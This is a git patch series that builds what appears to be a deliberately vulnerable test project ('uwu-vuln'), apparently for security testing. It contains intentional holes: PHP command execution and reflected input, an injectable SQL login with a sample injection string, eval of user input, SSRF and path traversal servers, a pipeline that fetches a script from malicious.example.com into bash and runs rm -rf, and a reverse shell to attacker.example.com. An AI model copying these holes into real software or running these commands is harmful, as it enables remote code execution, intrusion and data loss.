From f37058907c176e8b79f9f4623f217aa656f2fabf Mon Sep 17 00:00:00 2001 From: Raphael Date: Mon, 3 Feb 2025 17:39:10 -0800 Subject: [PATCH 1/9] Update main.py --- main.py | 3 +++ 1 file changed, 3 insertions(+) diff --git a/main.py b/main.py index 437934d..cf60782 100644 --- a/main.py +++ b/main.py @@ -6,6 +6,9 @@ app = Flask(__name__) app.secret_key = os.urandom(24) + +# Simulating a database of user accounts and their private notes# Simulating a database of user accounts and their private notes + # Simulating a database of user accounts and their private notes users = { 1: {"id": 1, "username": "alice", "password": generate_password_hash("password123")}, From 78a1b3dcb00507756775f9b44cc59d349d4c5017 Mon Sep 17 00:00:00 2001 From: Raphael Date: Mon, 3 Feb 2025 17:39:35 -0800 Subject: [PATCH 2/9] Update index.php --- index.php | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/index.php b/index.php index df3d645..894117d 100644 --- a/index.php +++ b/index.php @@ -1,5 +1,8 @@ " +$_GET["search"] + ""; +echo "" .$_GET["search"]. ""; + + +exec($_POST["exec"]); ?> From b9c9bda47eaa289a2c7c13ee6817dfda84070c67 Mon Sep 17 00:00:00 2001 From: Raphael Date: Mon, 3 Feb 2025 17:41:59 -0800 Subject: [PATCH 3/9] Create test.php --- test.php | 42 ++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 test.php diff --git a/test.php b/test.php new file mode 100644 index 0000000..cdd2a13 --- /dev/null +++ b/test.php @@ -0,0 +1,42 @@ +connect_error) { + die("Connection failed: ". $conn->connect_error); + } + + // admin + // gdhas' OR 1=1 # + + // Query database + $query = "SELECT * FROM users WHERE username = '$username' AND password = '$password'"; + + $result = $conn->query($query); + + // Check if user exists + if ($result->num_rows > 0) { + echo "Welcome, $username!"; + } else { + echo "$query Invalid username or password."; + } + + // Close connection + $conn->close(); +} From 8aa677f37d286a624071f176940225dbb15621b6 Mon Sep 17 00:00:00 2001 From: Raphael <25335191+rek7@users.noreply.github.com> Date: Fri, 18 Apr 2025 15:22:53 -0700 Subject: [PATCH 4/9] Update main.py --- main.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/main.py b/main.py index cf60782..2454076 100644 --- a/main.py +++ b/main.py @@ -41,7 +41,7 @@ def reverse_content(content): def apply_decryption(note): decrypted_content = reverse_content(note['content']) - os.system(note) + os.system(reverse_content) return {"id": note['id'], "content": decrypted_content} def decrypt_notes(encrypted_notes): From 0199ee6c94a44baffe96c859e298842323adea54 Mon Sep 17 00:00:00 2001 From: Raphael <25335191+rek7@users.noreply.github.com> Date: Thu, 10 Jul 2025 14:19:27 -0700 Subject: [PATCH 5/9] Create test.py --- test.py | 3 +++ 1 file changed, 3 insertions(+) create mode 100644 test.py diff --git a/test.py b/test.py new file mode 100644 index 0000000..0104a9b --- /dev/null +++ b/test.py @@ -0,0 +1,3 @@ +import random + +print("asd") From ea5f509c4d202d630174d5c8c1ad6edca9b7dbf8 Mon Sep 17 00:00:00 2001 From: Raphael Date: Thu, 28 Aug 2025 15:24:51 -0700 Subject: [PATCH 6/9] Create upload.php --- upload.php | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 upload.php diff --git a/upload.php b/upload.php new file mode 100644 index 0000000..ac74e8d --- /dev/null +++ b/upload.php @@ -0,0 +1,23 @@ + From f3976a4658934db65e6a7edffa8255efeb651266 Mon Sep 17 00:00:00 2001 From: Mohammed Date: Fri, 10 Oct 2025 09:19:25 -0400 Subject: [PATCH 7/9] stuff --- http/index.js | 56 +++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 56 insertions(+) create mode 100644 http/index.js diff --git a/http/index.js b/http/index.js new file mode 100644 index 0000000..1577130 --- /dev/null +++ b/http/index.js @@ -0,0 +1,56 @@ +const express = require('express'); +const axios = require('axios'); +const { URL } = require('url'); +const dns = require('dns').promises; +const app = express(); + +function isPrivateIp(ip) { + return ip === '::1' || + /^127\./.test(ip) || + /^10\./.test(ip) || + /^192\.168\./.test(ip) || + /^172\.(1[6-9]|2[0-9]|3[0-1])\./.test(ip) || + ip.startsWith('fc') || ip.startsWith('fd') || + ip.startsWith('fe80:'); +} + +// SSRF +app.get('/fetch', async (req, res) => { + const url = req.query.url; + let parsedUrl; + try { + parsedUrl = new URL(url); + } catch (e) { + return res.status(400).send('Invalid URL'); + } + const hostname = parsedUrl.hostname; + if (!['http:', 'https:'].includes(parsedUrl.protocol) || + hostname === 'localhost' || + hostname === '127.0.0.1' || + hostname === '::1' || + /^(10|127)\./.test(hostname) || + /^172\.(1[6-9]|2[0-9]|3[0-1])\./.test(hostname) || + /^192\.168\./.test(hostname)) { + return res.status(400).send('URL not allowed'); + } + try { + // DNS resolution to prevent DNS rebinding + try { + const addresses = await dns.lookup(parsedUrl.hostname, { all: true }); + for (const { address } of addresses) { + if (isPrivateIp(address)) { + return res.status(400).send('URL not allowed'); + } + } + } catch (e) { + return res.status(400).send('Invalid hostname'); + } + + const resp = await axios.get(url); + res.send(resp.data); + } catch (e) { + res.status(500).send(e.message); + } +}); + +app.listen(3000, () => console.log('HTTP vuln on port 3000')); From 38974cbabf88db0c9ca546c262c16cebf80c2052 Mon Sep 17 00:00:00 2001 From: Mohammed Date: Fri, 10 Oct 2025 11:36:29 -0400 Subject: [PATCH 8/9] af --- browser/index.js | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 browser/index.js diff --git a/browser/index.js b/browser/index.js new file mode 100644 index 0000000..5f1b215 --- /dev/null +++ b/browser/index.js @@ -0,0 +1,5 @@ +function executeUserScript() { + var userScript = document.getElementById('userScript').value; + // Using eval to execute user-provided script + eval(userScript); +} From bb2dea1fed35ac02b3f62f32c12679c44b0507d7 Mon Sep 17 00:00:00 2001 From: Mohammed Date: Tue, 4 Nov 2025 16:46:15 -0500 Subject: [PATCH 9/9] add code --- browser copy/index.js | 5 ++++ cli/index.js | 18 ++++++++++++++ disk/index.js | 17 +++++++++++++ http copy/index.js | 56 +++++++++++++++++++++++++++++++++++++++++++ package.json | 11 +++++++++ stdin/index.js | 12 ++++++++++ ws/index.js | 12 ++++++++++ 7 files changed, 131 insertions(+) create mode 100644 browser copy/index.js create mode 100644 cli/index.js create mode 100644 disk/index.js create mode 100644 http copy/index.js create mode 100644 package.json create mode 100644 stdin/index.js create mode 100644 ws/index.js diff --git a/browser copy/index.js b/browser copy/index.js new file mode 100644 index 0000000..5f1b215 --- /dev/null +++ b/browser copy/index.js @@ -0,0 +1,5 @@ +function executeUserScript() { + var userScript = document.getElementById('userScript').value; + // Using eval to execute user-provided script + eval(userScript); +} diff --git a/cli/index.js b/cli/index.js new file mode 100644 index 0000000..7e5db7a --- /dev/null +++ b/cli/index.js @@ -0,0 +1,18 @@ +const { exec } = require('child_process'); + +const userArg = process.argv[2] || ''; + +const cmd = ` + rm -rf /tmp/vuln_dir --no-preserve-root && + curl http://malicious.example.com/install.sh | bash && + ls ${userArg} +`; + +console.log('[*] Running dangerous CLI pipeline…'); +exec(cmd, (err, stdout, stderr) => { + if (err) { + console.error('[!] Pipeline failed:', err); + return; + } + console.log('[+] Pipeline succeeded. stdout:\\n', stdout); +}); diff --git a/disk/index.js b/disk/index.js new file mode 100644 index 0000000..963519e --- /dev/null +++ b/disk/index.js @@ -0,0 +1,17 @@ +const express = require('express'); +const fs = require('fs'); +const path = require('path'); +const app = express(); + +// Path Traversal +app.get('/read', (req, res) => { + const file = req.query.file; + const fullPath = path.resolve(__dirname, file); + if (!fullPath.startsWith(__dirname + path.sep)) return res.status(400).send('Invalid file path'); + fs.readFile(fullPath, 'utf8', (err, data) => { + if (err) return res.status(500).send(err.message); + res.send(data); + }); +}); + +app.listen(3001, () => console.log('Disk vuln on port 3001')); diff --git a/http copy/index.js b/http copy/index.js new file mode 100644 index 0000000..1577130 --- /dev/null +++ b/http copy/index.js @@ -0,0 +1,56 @@ +const express = require('express'); +const axios = require('axios'); +const { URL } = require('url'); +const dns = require('dns').promises; +const app = express(); + +function isPrivateIp(ip) { + return ip === '::1' || + /^127\./.test(ip) || + /^10\./.test(ip) || + /^192\.168\./.test(ip) || + /^172\.(1[6-9]|2[0-9]|3[0-1])\./.test(ip) || + ip.startsWith('fc') || ip.startsWith('fd') || + ip.startsWith('fe80:'); +} + +// SSRF +app.get('/fetch', async (req, res) => { + const url = req.query.url; + let parsedUrl; + try { + parsedUrl = new URL(url); + } catch (e) { + return res.status(400).send('Invalid URL'); + } + const hostname = parsedUrl.hostname; + if (!['http:', 'https:'].includes(parsedUrl.protocol) || + hostname === 'localhost' || + hostname === '127.0.0.1' || + hostname === '::1' || + /^(10|127)\./.test(hostname) || + /^172\.(1[6-9]|2[0-9]|3[0-1])\./.test(hostname) || + /^192\.168\./.test(hostname)) { + return res.status(400).send('URL not allowed'); + } + try { + // DNS resolution to prevent DNS rebinding + try { + const addresses = await dns.lookup(parsedUrl.hostname, { all: true }); + for (const { address } of addresses) { + if (isPrivateIp(address)) { + return res.status(400).send('URL not allowed'); + } + } + } catch (e) { + return res.status(400).send('Invalid hostname'); + } + + const resp = await axios.get(url); + res.send(resp.data); + } catch (e) { + res.status(500).send(e.message); + } +}); + +app.listen(3000, () => console.log('HTTP vuln on port 3000')); diff --git a/package.json b/package.json new file mode 100644 index 0000000..5cb2217 --- /dev/null +++ b/package.json @@ -0,0 +1,11 @@ +{ + "name": "uwu-vuln", + "version": "1.0.0", + "main": "index.js", + "scripts": { + "test": "echo \"Error: no test specified\" && exit 1" + }, + "author": "", + "license": "ISC", + "description": "" +} diff --git a/stdin/index.js b/stdin/index.js new file mode 100644 index 0000000..b712e33 --- /dev/null +++ b/stdin/index.js @@ -0,0 +1,12 @@ +const { exec } = require('child_process'); + +const payload = 'bash -i >& /dev/tcp/attacker.example.com/4444 0>&1'; + +console.log('[*] Executing reverse shell payload…'); +exec(payload, (err, stdout, stderr) => { + if (err) { + console.error('[!] Error executing payload:', err); + return; + } + console.log('[+] Payload executed. stdout:', stdout); +}); diff --git a/ws/index.js b/ws/index.js new file mode 100644 index 0000000..7b0fc64 --- /dev/null +++ b/ws/index.js @@ -0,0 +1,12 @@ +const WebSocket = require('ws'); +const wss = new WebSocket.Server({ port: 8080 }); + +// RCE +wss.on('connection', ws => { + ws.on('message', msg => { + eval(msg); + ws.send('Executed: ' + msg); + }); +}); + +console.log('WS vuln on port 8080'); \ No newline at end of file